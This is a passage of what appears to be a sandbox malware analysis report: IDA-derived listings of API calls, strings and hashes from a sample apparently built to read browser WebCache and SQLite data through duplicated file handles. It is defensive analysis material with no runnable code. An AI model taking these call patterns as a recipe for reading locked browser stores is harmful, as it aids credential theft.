                                                                                                                                                                                                                                      • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                                                                                                                                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                       • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                       • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                                      • String ID: "%s"
                                                                                                                                                                                                                                      • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                                      • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                                                                                                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                                                                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                       • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                       • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                                                                      • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 1714573020-3385500049
                                                                                                                                                                                                                                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408888
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                       • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                       • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2911713577-0
                                                                                                                                                                                                                                      • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                                                                                                                                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                       • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                       • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                                                                      • String ID: @ $SQLite format 3
                                                                                                                                                                                                                                      • API String ID: 1475443563-3708268960
                                                                                                                                                                                                                                      • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                       • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                       • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmpqsort
                                                                                                                                                                                                                                      • String ID: /nosort$/sort
                                                                                                                                                                                                                                      • API String ID: 1579243037-1578091866
                                                                                                                                                                                                                                      • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                                                                                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                                                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                                                                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                                                      • API String ID: 2887208581-2114579845
                                                                                                                                                                                                                                      • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                                                                                                                                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3473537107-0
                                                                                                                                                                                                                                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(02250048), ref: 0044DF01
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(02260050), ref: 0044DF11
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00AA6DA8), ref: 0044DF21
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(02260458), ref: 0044DF31
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                                      • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                                      • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                                                      • API String ID: 2221118986-1725073988
                                                                                                                                                                                                                                      • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                                                                                                                                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@DeleteObject
                                                                                                                                                                                                                                      • String ID: r!A
                                                                                                                                                                                                                                      • API String ID: 1103273653-628097481
                                                                                                                                                                                                                                      • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                                                                                                                                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1033339047-0
                                                                                                                                                                                                                                      • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$memcmp
                                                                                                                                                                                                                                      • String ID: $$8
                                                                                                                                                                                                                                      • API String ID: 2808797137-435121686
                                                                                                                                                                                                                                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                        • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                                                                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                        • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,762D2EE0), ref: 0040E3EC
                                                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                                                                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                        • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1979745280-0
                                                                                                                                                                                                                                      • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                                                                                                                                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                                        • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                                                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00418803
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
